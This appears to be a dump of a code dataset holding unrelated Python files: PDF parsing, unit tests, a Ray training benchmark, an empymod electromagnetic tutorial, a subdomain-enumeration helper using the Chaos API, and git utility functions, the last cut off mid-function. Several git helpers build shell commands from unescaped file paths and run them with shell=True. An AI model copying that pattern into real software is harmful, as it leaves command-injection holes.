id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
55336
|
import pdfcutter
import helper
import json #For writing PDF Link JSON File
import os #To check if PDF Link JSON File exists
#get_session is main method for parsing session to Senats/Bundesrats Texts dict
class MainExtractorMethod:
#In: Can't init TextExtractorHolder before (missing paras in get_beschluesse_text), so have class as input in init
def __init__(self, textExtractorHolderSubclass):
self.textExtractorHolderSubclass = textExtractorHolderSubclass #Needed for get_beschluesse_text and no cyclic dependencies
#In: Session Dict
#Out: Dict of "TOP: {'senat': senatsText, 'bundesrat': BRText}" entries
def get_session(self, session):
PDF_URLS = dict(self._get_pdf_urls())
URLFILENAME = "session_urls.json"
if not os.path.exists(URLFILENAME): #Create PDF Link JSON File
with open(URLFILENAME, 'w') as f: #Because of override of MainExtractorMethod in counties, the FILENAME is always relative to folder
json.dump(PDF_URLS, f)
try:
filename = helper.get_session_pdf_filename(session, PDF_URLS)
except KeyError:
return
return self.get_beschluesse_text(session, filename)
#Out: Dict of {sessionNumberOfBR: PDFWebLink} entries
#For each County very different, so implement it new each time
def _get_pdf_urls(self):
raise NotImplementedError()
#Out: Dict of "TOP: {'senat': senatsText, 'bundesrat': BRText}" entries
#Extraction work done in AbstractSenatsAndBRTextExtractor Subclasses
def get_beschluesse_text(self, session, filename):
extractor = self.textExtractorHolderSubclass(filename, session)
return dict(extractor.getSenatsAndBRTextsForAllSessionTOPs())
|
55340
|
class Solution:
# @param A : list of integers
# @return an integer
def solve(self, A):
s = set(A)
if len(s) == len(A):
return -1
for i in A:
if A.count(i) > 1:
return i
else:
return -1
|
55363
|
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class ChatstateProtocolEntity(ProtocolEntity):
'''
INCOMING
<chatstate from="<EMAIL>">
<{{composing|paused}}></{{composing|paused}}>
</chatstate>
OUTGOING
<chatstate to="<EMAIL>">
<{{composing|paused}}></{{composing|paused}}>
</chatstate>
'''
STATE_TYPING = "composing"
STATE_PAUSED = "paused"
STATES = (STATE_TYPING, STATE_PAUSED)
def __init__(self, _state):
super(ChatstateProtocolEntity, self).__init__("chatstate")
assert _state in self.__class__.STATES, "Expected chat state to be in %s, got %s" % (self.__class__.STATES, _state)
self._state = _state
def getState(self):
return self._state
def toProtocolTreeNode(self):
node = self._createProtocolTreeNode({}, None, data = None)
node.addChild(ProtocolTreeNode(self._state))
return node
def __str__(self):
out = "CHATSTATE:\n"
out += "State: %s\n" % self._state
return out
@staticmethod
def fromProtocolTreeNode(node):
return ChatstateProtocolEntity(
node.getAllChildren()[0].tag,
)
|
55395
|
import unittest
import imp
import sys
import shapy
class TestSettings(unittest.TestCase):
def setUp(self):
self.settings = imp.new_module('test_settings')
sys.modules.update(test_settings=self.settings)
setattr(self.settings, 'UNITS', 'override')
setattr(self.settings, 'NEW_OPTION', 'new')
def test_settings_override(self):
shapy.register_settings('test_settings')
from shapy import settings
self.assertEqual(settings.UNITS, 'override')
self.assertEqual(getattr(settings, 'NEW_OPTION', None), 'new')
|
55432
|
import json
import os
import time
import ray
from ray.train import Trainer
from ray.train.examples.horovod.horovod_example import (
train_func as horovod_torch_train_func,
)
if __name__ == "__main__":
ray.init(address=os.environ.get("RAY_ADDRESS", "auto"))
start_time = time.time()
num_workers = 8
num_epochs = 10
trainer = Trainer("horovod", num_workers)
trainer.start()
results = trainer.run(
horovod_torch_train_func, config={"num_epochs": num_epochs, "lr": 1e-3}
)
trainer.shutdown()
assert len(results) == num_workers
for worker_result in results:
assert len(worker_result) == num_epochs
assert worker_result[num_epochs - 1] < worker_result[0]
delta = time.time() - start_time
with open(os.environ["TEST_OUTPUT_JSON"], "w") as f:
f.write(json.dumps({"train_time": delta, "success": True}))
|
55438
|
import numpy as np
from gtsam import SfmTrack
from gtsfm.common.image import Image
import gtsfm.utils.images as image_utils
def test_get_average_point_color():
""" Ensure 3d point color is computed as mean of RGB per 2d measurement."""
# random point; 2d measurements below are dummy locations (not actual projection)
triangulated_pt = np.array([1, 2, 1])
track_3d = SfmTrack(triangulated_pt)
# in camera 0
track_3d.add_measurement(idx=0, m=np.array([130, 80]))
# in camera 1
track_3d.add_measurement(idx=1, m=np.array([10, 60]))
img0 = np.zeros((100, 200, 3), dtype=np.uint8)
img0[80, 130] = np.array([40, 50, 60])
img1 = np.zeros((100, 200, 3), dtype=np.uint8)
img1[60, 10] = np.array([60, 70, 80])
images = {0: Image(img0), 1: Image(img1)}
r, g, b = image_utils.get_average_point_color(track_3d, images)
assert r == 50
assert g == 60
assert b == 70
def test_get_downsampling_factor_per_axis_leaveintact() -> None:
"""Ensure that image is left intact, when shorter side is smaller than max_resolution."""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 800
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
assert scale_u == 1.0
assert scale_v == 1.0
assert new_h == 700
assert new_w == 1500
def test_get_rescaling_factor_per_axis_upsample() -> None:
"""Ensure that max resolution constraint is met, when upsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 800 px.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 800
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# 8/7 will not give a clean integer division
assert np.isclose(scale_u, 1.1427, atol=4)
assert np.isclose(scale_v, 1.1429, atol=4)
assert new_h == 800
assert new_w == 1714
def test_get_downsampling_factor_per_axis() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is AT MOST 600 px.
Image is in landscape mode.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8573, atol=4)
assert np.isclose(scale_v, 0.8571, atol=4)
assert new_h == 600
assert new_w == 1286
def test_get_rescaling_factor_per_axis_downsample() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 600 px.
Image is in landscape mode.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8573, atol=4)
assert np.isclose(scale_v, 0.8571, atol=4)
assert new_h == 600
assert new_w == 1286
def test_get_downsampling_factor_per_axis_portrait() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is AT MOST 600 px.
Image is in portrait mode.
"""
img_h = 1500
img_w = 700
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8571, atol=4)
assert np.isclose(scale_v, 0.8573, atol=4)
assert new_h == 1286
assert new_w == 600
def test_get_rescaling_factor_per_axis_downsample_portrait() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 600 px.
Image is in portrait mode.
"""
img_h = 1500
img_w = 700
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_v, 0.8571, atol=4)
assert np.isclose(scale_u, 0.8573, atol=4)
assert new_h == 1286
assert new_w == 600
|
55456
|
r"""
Difference between magnetic dipole and loop sources
===================================================
In this example we look at the differences between an electric loop loop, which
results in a magnetic source, and a magnetic dipole source.
The derivation of the electromagnetic field in Hunziker et al. (2015) is for
electric and magnetic point-dipole sources and receivers. The magnetic field
due to a magnetic source (:math:`mm`) is obtain from the electric field due to
an electric source (:math:`ee`) using the duality principle, given in their
Equation (11),
.. math::
\hat{G}^{mm}_{pq}(\mathbf{x}, \mathbf{x'}, s, \eta_{kr}, \zeta_{ij}) =
-\hat{G}^{ee}_{pq}(\mathbf{x}, \mathbf{x'}, s, -\zeta_{kr}, -\eta_{ij}) \,
. \qquad (1)
Without going into the details of the different parameters, we can focus on the
difference between the :math:`mm` and :math:`ee` fields for a homogeneous,
isotropic fullspace by simplifying this further to
.. math::
\mathbf{G}^{mm}_\text{dip-dip} = \frac{\eta}{\zeta}\mathbf{G}^{ee} \quad
\xrightarrow{\text{diff. approx}} \quad \frac{\sigma}{\mathrm{i}\omega
\mu}\mathbf{G}^{ee}_\text{dip-dip} \, . \qquad (2)
Here, :math:`\sigma` is conductivity (S/m), :math:`\omega=2\pi f` is angular
frequency (Hz), and :math:`\mu` is the magnetic permeability (H/m). So from
Equation (2) we see that the :math:`mm` field differs from the :math:`ee`
field by a factor :math:`\sigma/(\mathrm{i}\omega\mu)`.
A magnetic dipole source has a moment of :math:`I^mds`; however, a magnetic
dipole source is basically never used in geophysics. Instead a loop of an
electric wire is used, which generates a magnetic field. The moment generated
by this loop is given by :math:`I^m = \mathrm{i}\omega\mu N A I^e`, where
:math:`A` is the area of the loop (m:math:`^2`), and :math:`N` the number of
turns of the loop. So the difference between a unit magnetic dipole and a unit
loop (:math:`A=1, N=1`) is the factor :math:`\mathrm{i}\omega\mu`, hence
Equation (2) becomes
.. math::
\mathbf{G}^{mm}_\text{loop-dip} =
\mathrm{i}\omega\mu\mathbf{G}^{mm}_\text{dip-dip} =
\sigma\,\mathbf{G}^{ee}_\text{dip-dip} \, . \qquad (3)
This notebook shows this relation in the frequency domain, as well as for
impulse, step-on, and step-off responses in the time domain.
We can actually model an **electric loop** instead of adjusting the magnetic
dipole solution to correspond to a loop source. This is shown in the second
part of the notebook.
**References**
- <NAME>., <NAME>, and <NAME>, 2015, The electromagnetic response
in a layered vertical transverse isotropic medium: A new look at an old
problem: Geophysics, 80(1), F1–F18; DOI: `10.1190/geo2013-0411.1
<https://doi.org/10.1190/geo2013-0411.1>`_.
"""
import empymod
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
# sphinx_gallery_thumbnail_number = 3
###############################################################################
# 1. Using the magnetic dipole solution
# -------------------------------------
#
# Survey parameters
# ~~~~~~~~~~~~~~~~~
#
# - Homogenous fullspace of :math:`\sigma` = 0.01 S/m.
# - Source at the origin, x-directed.
# - Inline receiver with offset of 100 m, x-directed.
freq = np.logspace(-1, 5, 301) # Frequencies (Hz)
time = np.logspace(-6, 0, 301) # Times (s)
src = [0, 0, 0, 0, 0] # x-dir. source at the origin [x, y, z, azimuth, dip]
rec = [100, 0, 0, 0, 0] # x-dir. receiver 100m away from source, inline
cond = 0.01 # Conductivity (S/m)
###############################################################################
# Computation using ``empymod``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Collect common parameters
inp = {'src': src, 'rec': rec, 'depth': [], 'res': 1/cond, 'verb': 1}
# Frequency domain
inp['freqtime'] = freq
fee_dip_dip = empymod.bipole(**inp)
fmm_dip_dip = empymod.bipole(msrc=True, mrec=True, **inp)
f_loo_dip = empymod.loop(**inp)
# Time domain
inp['freqtime'] = time
# ee
ee_dip_dip_of = empymod.bipole(signal=-1, **inp)
ee_dip_dip_im = empymod.bipole(signal=0, **inp)
ee_dip_dip_on = empymod.bipole(signal=1, **inp)
# mm dip-dip
dip_dip_of = empymod.bipole(signal=-1, msrc=True, mrec=True, **inp)
dip_dip_im = empymod.bipole(signal=0, msrc=True, mrec=True, **inp)
dip_dip_on = empymod.bipole(signal=1, msrc=True, mrec=True, **inp)
# mm loop-dip
loo_dip_of = empymod.loop(signal=-1, **inp)
loo_dip_im = empymod.loop(signal=0, **inp)
loo_dip_on = empymod.loop(signal=1, **inp)
###############################################################################
# Plot the result
# ~~~~~~~~~~~~~~~
fs = 16 # Fontsize
# Figure
fig = plt.figure(figsize=(12, 8))
# Frequency Domain
plt.subplot(231)
plt.title(r'$G^{ee}_{\rm{dip-dip}}$', fontsize=fs)
plt.plot(freq, fee_dip_dip.real, 'C0-', label='Real')
plt.plot(freq, -fee_dip_dip.real, 'C0--')
plt.plot(freq, fee_dip_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -fee_dip_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.ylim([5e-8, 2e-5])
ax1 = plt.subplot(232)
plt.title(r'$G^{mm}_{\rm{dip-dip}}$', fontsize=fs)
plt.plot(freq, fmm_dip_dip.real, 'C0-', label='Real')
plt.plot(freq, -fmm_dip_dip.real, 'C0--')
plt.plot(freq, fmm_dip_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -fmm_dip_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('Frequency (Hz)', fontsize=fs-2)
plt.legend()
plt.subplot(233)
plt.title(r'$G^{mm}_{\rm{loop-dip}}$', fontsize=fs)
plt.plot(freq, f_loo_dip.real, 'C0-', label='Real')
plt.plot(freq, -f_loo_dip.real, 'C0--')
plt.plot(freq, f_loo_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -f_loo_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.ylim([5e-10, 2e-7])
plt.text(1.05, 0.5, "Frequency Domain", {'fontsize': fs},
horizontalalignment='left', verticalalignment='center',
rotation=-90, clip_on=False, transform=plt.gca().transAxes)
# Time Domain
plt.subplot(234)
plt.plot(time, ee_dip_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -ee_dip_dip_of, 'C0--')
plt.plot(time, ee_dip_dip_im, 'C1-', label='Impulse')
plt.plot(time, -ee_dip_dip_im, 'C1--')
plt.plot(time, ee_dip_dip_on, 'C2-', label='Step-On')
plt.plot(time, -ee_dip_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.subplot(235)
plt.plot(time, dip_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -dip_dip_of, 'C0--')
plt.plot(time, dip_dip_im, 'C1-', label='Impulse')
plt.plot(time, -dip_dip_im, 'C1--')
plt.plot(time, dip_dip_on, 'C2-', label='Step-On')
plt.plot(time, -dip_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('Time (s)', fontsize=fs-2)
plt.legend()
plt.subplot(236)
plt.plot(time, loo_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -loo_dip_of, 'C0--')
plt.plot(time, loo_dip_im, 'C1-', label='Impulse')
plt.plot(time, -loo_dip_im, 'C1--')
plt.plot(time, loo_dip_on, 'C2-', label='Step-On')
plt.plot(time, -loo_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.text(1.05, 0.5, "Time Domain", {'fontsize': fs},
horizontalalignment='left', verticalalignment='center',
rotation=-90, clip_on=False, transform=plt.gca().transAxes)
fig.text(-0.01, 0.5, 'Amplitude; e-rec (V/m); m-rec (A/m)',
va='center', rotation='vertical', fontsize=fs, color='.4')
plt.tight_layout()
plt.show()
###############################################################################
# The figure shows the main points of Equations (2) and (3):
#
# - The magnetic dipole-dipole response differs by a factor
# :math:`\sigma/(\mathrm{i}\omega\mu)` from the electric dipole-dipole
# response. That means for the time-domain that the magnetic response looks
# more like the time derivative of the electric response (e.g., the magnetic
# impulse responses resembles the electric step-on response).
# - The magnetic loop-dipole response differs only by :math:`\sigma` from the
# electric dipole-dipole response, hence a factor of 0.01.
#
# The units of the response only depend on the receiver, what the receiver
# actually measures. So if we change the source from a dipole to a loop it does
# not change the units of the received responses.
#
# 2. Using an electric loop
# -------------------------
#
# We can use ``empymod`` to model arbitrary shaped sources by simply adding
# point dipole sources together. This is what ``empymod`` does internally to
# model a finite length dipole (``empymod.bipole``), where it uses a Gaussian
# quadrature with a few points.
#
# Here, we are going to compare the result from ``loop``, as presented above,
# with two different simulations of an electric loop source, assuming a square
# loop which sides are 1 m long, so the area correspond to one square meter.
#
# Plotting routines
# ~~~~~~~~~~~~~~~~~
def plot_result(data1, data2, x, title, vmin=-15., vmax=-7., rx=0):
"""Plot result."""
fig = plt.figure(figsize=(18, 10))
def setplot(name):
"""Plot settings"""
plt.title(name)
plt.xlim(rx.min(), rx.max())
plt.ylim(rx.min(), rx.max())
plt.axis("equal")
# Plot Re(data)
ax1 = plt.subplot(231)
setplot(r"(a) |Re(magn.dip*iwu)|")
cf0 = plt.pcolormesh(rx, rx, np.log10(np.abs(data1.real)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax2 = plt.subplot(232)
setplot(r"(b) |Re(el. square)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data2.real)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax3 = plt.subplot(233)
setplot(r"(c) Error real part")
error_r = np.abs((data1.real-data2.real)/data1.real)*100
cf2 = plt.pcolormesh(rx, rx, np.log10(error_r), vmin=-2, vmax=2,
linewidth=0, rasterized=True,
cmap=plt.cm.get_cmap("RdBu_r", 8),
shading='nearest')
# Plot Im(data)
ax4 = plt.subplot(234)
setplot(r"(d) |Im(magn.dip*iwu)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data1.imag)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax5 = plt.subplot(235)
setplot(r"(e) |Im(el. square)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data2.imag)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax6 = plt.subplot(236)
setplot(r"(f) Error imag part")
error_i = np.abs((data1.imag-data2.imag)/data1.imag)*100
plt.pcolormesh(rx, rx, np.log10(error_i), vmin=-2, vmax=2,
linewidth=0, rasterized=True,
cmap=plt.cm.get_cmap("RdBu_r", 8),
shading='nearest')
# Colorbars
fig.colorbar(cf0, ax=[ax1, ax2, ax3], label=r"$\log_{10}$ Amplitude (A/m)")
cbar = fig.colorbar(cf2, ax=[ax4, ax5, ax6], label=r"Relative Error")
cbar.set_ticks([-2, -1, 0, 1, 2])
cbar.ax.set_yticklabels([r"$0.01\,\%$", r"$0.1\,\%$", r"$1\,\%$",
r"$10\,\%$", r"$100\,\%$"])
# Axis label
fig.text(0.4, 0.05, "Inline Offset (m)", fontsize=14)
fig.text(0.08, 0.5, 'Crossline Offset (m)', rotation=90, fontsize=14)
# Title
fig.suptitle(title, y=.95, fontsize=20)
plt.show()
###############################################################################
# Model parameters
# ~~~~~~~~~~~~~~~~
#
# - Resistivity: :math:`1 \Omega` m fullspace
#
# Survey
# ~~~~~~
#
# - Source at [0, 0, 0]
# - Receivers at [x, y, 10]
# - frequencies: 100 Hz.
# - Offsets: -250 m - 250 m
# Survey parameters
x = ((np.arange(502))-250.5)
rx = np.repeat([x, ], np.size(x), axis=0)
ry = rx.transpose()
rxx = rx.ravel()
ryy = ry.ravel()
# Model
model = {
'depth': [], # Fullspace
'res': 1., # 1 Ohm.m
'freqtime': 100, # 100 Hz
'htarg': {'pts_per_dec': -1},
'verb': 1,
}
###############################################################################
# Compute ``empymod.loop`` result
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
epm_loop = empymod.loop(src=[0, 0, 0, 0, 90], rec=[rxx, ryy, 10, 0, 0],
**model).reshape(np.shape(rx))
###############################################################################
# 2.1 Point dipoles at (x, y) using ``empymod.dipole``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# - (0.5, 0), ab=42
# - (0, 0.5), ab=41
# - (-0.5, 0), ab=-42
# - (0, -0.5), ab=-41
#
rec_dip = [rxx, ryy, 10]
square_pts = +empymod.dipole(src=[+0.5, +0.0, 0], rec=rec_dip, ab=42,
**model).reshape(np.shape(rx))
square_pts += empymod.dipole(src=[+0.0, +0.5, 0], rec=rec_dip, ab=41,
**model).reshape(np.shape(rx))
square_pts -= empymod.dipole(src=[-0.5, +0.0, 0], rec=rec_dip, ab=42,
**model).reshape(np.shape(rx))
square_pts -= empymod.dipole(src=[+0.0, -0.5, 0], rec=rec_dip, ab=41,
**model).reshape(np.shape(rx))
plot_result(epm_loop, square_pts, x, 'Loop made of four points',
vmin=-13, vmax=-5, rx=x)
###############################################################################
# 2.2 Finite length dipoles using ``empymod.bipole``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Each simulated with a 5pt Gaussian quadrature. The dipoles are:
#
# - (-0.5, -0.5) to (+0.5, -0.5)
# - (+0.5, -0.5) to (+0.5, +0.5)
# - (+0.5, +0.5) to (-0.5, +0.5)
# - (-0.5, +0.5) to (-0.5, -0.5)
inp_dip = {
'rec': [rxx, ryy, 10, 0, 0],
'mrec': True,
'srcpts': 5 # Gaussian quadr. with 5 pts to simulate a finite length dip.
}
square_dip = +empymod.bipole(src=[+0.5, +0.5, -0.5, +0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[+0.5, -0.5, +0.5, +0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[-0.5, -0.5, +0.5, -0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[-0.5, +0.5, -0.5, -0.5, 0, 0],
**inp_dip, **model)
square_dip = square_dip.reshape(np.shape(rx))
plot_result(epm_loop, square_dip, x, 'Loop made of four dipoles',
vmin=-13, vmax=-5, rx=x)
###############################################################################
# Close to the source the results between
#
# - (1) a magnetic dipole,
# - (2) an electric loop conisting of four point sources, and
# - (3) an electric loop consisting of four finite length dipoles,
#
# differ, as expected. However, for the vast majority they are identical. Skin
# depth for our example with :math:`\rho=1\Omega` m and :math:`f=100` Hz is
# roughly 50 m, so the results are basically identical for 4-5 skin depths,
# after which the signal is very low.
empymod.Report()
|
55462
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.testutils import APITestCase
from sentry.models import UserReport
class ProjectUserReportsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
report_1 = UserReport.objects.create(
project=project,
event_id='a' * 32,
name='Foo',
email='<EMAIL>',
comments='Hello world',
group=group,
)
# should not be included due to missing link
UserReport.objects.create(
project=project,
event_id='b' * 32,
name='Bar',
email='<EMAIL>',
comments='Hello world',
)
url = reverse('sentry-api-0-project-user-reports', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
})
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert sorted(map(lambda x: x['id'], response.data)) == sorted([
str(report_1.id),
])
|
55466
|
import requests
from json import loads
from termcolor import colored
from configparser import RawConfigParser
def init(domain):
PDCH = []
print(colored("[*]-Searching Project Discovery Chaos...", "yellow"))
parser = RawConfigParser()
parser.read("config.ini")
CHAOS_KEY = parser.get("PDChaos", "CHAOS_API_KEY")
if CHAOS_KEY == "":
print(" \__", colored("No Project Discovery Chaos API key configured", "red"))
return []
headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Authorization": CHAOS_KEY}
url = "https://dns.projectdiscovery.io/dns/{0}/subdomains".format(domain)
try:
response = requests.get(url, headers=headers).text
subdomains = loads(response)["subdomains"]
for subdomain in subdomains:
if subdomain:
PDCH.append("{0}.{1}".format(subdomain, domain))
PDCH = set(PDCH)
print(" \__ {0}: {1}".format(colored("Subdomains found", "cyan"), colored(len(PDCH), "yellow")))
return PDCH
except requests.exceptions.RequestException as err:
print(" \__", colored(err, "red"))
return []
except requests.exceptions.HTTPError as errh:
print(" \__", colored(errh, "red"))
return []
except requests.exceptions.ConnectionError as errc:
print(" \__", colored(errc, "red"))
return []
except requests.exceptions.Timeout as errt:
print(" \__", colored(errt, "red"))
return []
except Exception:
print(" \__", colored("Something went wrong!", "red"))
return []
|
55467
|
from pathlib import Path
def absolute_path(path):
src_path = str(Path(__file__).parent.resolve())
return src_path + "/" + path
# Paths
DATASET_DIRECTORY = absolute_path("../dataset")
CLEAN_DATA_PATH = absolute_path("clean_data")
TIME_SERIES_PATH = absolute_path("clean_data/series.npy")
TRAINED_MODELS_PATH = absolute_path("trained_models")
SCALER_PATH = absolute_path("trained_models/scaler.pkl")
GRU_PATH = absolute_path("trained_models/gru.hdf5")
LSTM_PATH = absolute_path("trained_models/lstm.hdf5")
XGB_MSE_REGRESSOR_PATH = absolute_path("trained_models/xgb-mse.json")
XGB_HUBBER_REGRESSOR_PATH = absolute_path("trained_models/xgb-hub.json")
XGB_QUANTILE_REGRESSOR_PREFIX = absolute_path("trained_models/xgb-")
ENSEMBLE_MODEL_PATH = absolute_path("trained_models/ensemble.hdf5")
SL_DATASET_TEMPLATE = absolute_path("clean_data/dataset-{}.npz")
# Create directories if not exist
Path(TRAINED_MODELS_PATH).mkdir(parents=False, exist_ok=True)
Path(CLEAN_DATA_PATH).mkdir(parents=False, exist_ok=True)
# Training set size.
LVL_0_TRAIN_SIZE = 450000
LVL_1_TRAIN_SIZE = 105000
# Default batch size for every model
DEFAULT_BATCH_SIZE = 1000
# Dataset repetitions (data augmentation).
# XGB regressors seem to work better without data augmentation.
DATA_REPETITIONS_XGB = 1
# NN models seem to work better with 3 dataset repetitions.
DATA_REPETITIONS_NN = 3
|
55472
|
import subprocess
import os
def getBlame(f):
folder = os.path.split(f)[0]
cwd = os.getcwd()
os.chdir(folder)
cmd = "git blame --abbrev=0 -e \"" + f + "\""
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response, err = sub.communicate()
response = response.decode()
err = err.decode()
except subprocess.CalledProcessError as e:
print("Error: " + e.output)
response = ''
except UnicodeDecodeError as e:
print("Error: UnicodeDecodeError")
response = ''
if len(err) > 0:
if "no such path" in err:
response = '' # Ignore new file.
else:
print("Error: " + err)
response = ''
if response == '':
data_by_line = None
else:
data_by_line = response.split('\n')
os.chdir(cwd)
return data_by_line
def getAuthor(f,line):
author = 'Not found'
line += 1 # no line zero.
folder = os.path.split(f)[0]
cwd = os.getcwd()
os.chdir(folder)
cmd = "git blame -p -L " + str(line) + "," + str(line) + "\"" + f + "\""
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response, err = sub.communicate()
response = response.decode()
err = err.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
if 'fatal' in err:
return author
data_by_line = response.split('\n')
for row in data_by_line:
if row[:7] == 'author ':
author = row[7:]
break
return author
def getRepo(folder):
cmd = 'git config --get remote.origin.url'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getBranch(folder):
cmd = 'git branch | grep \'*\''
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response[2:]
def getDiff(folder):
cmd = 'git diff --name-status HEAD..HEAD~'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def checkoutRevision(folder, prev):
cmd = 'git checkout HEAD~' + str(int(prev))
cwd = os.getcwd()
os.chdir(folder)
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, err = sub.communicate()
err = err.decode()
except subprocess.CalledProcessError as e:
print('exception')
print(e.output)
os.chdir(cwd)
return err
def resetHead(folder, branch):
cmd = 'git checkout ' + branch
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getFileCount(folder):
cmd = 'git ls-files | wc -l'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response.strip()
def getLineCount(folder):
cmd = 'git ls-files | xargs wc -l'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
response = response[:-1].split('\n')
return response[-1]
def getLastCommit(folder):
cmd = 'git log -1 --date=local'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getLastCommitDate(folder):
msg = getLastCommit(folder)
lines = msg.split('\n')
for line in lines:
if 'Date:' in line:
return line[5:].strip()
return 'Date not found.'
def getCommitNumber(folder):
msg = getLastCommit(folder)
lines = msg.split('\n')
return lines[0][7:14]
def parseRepo(url):
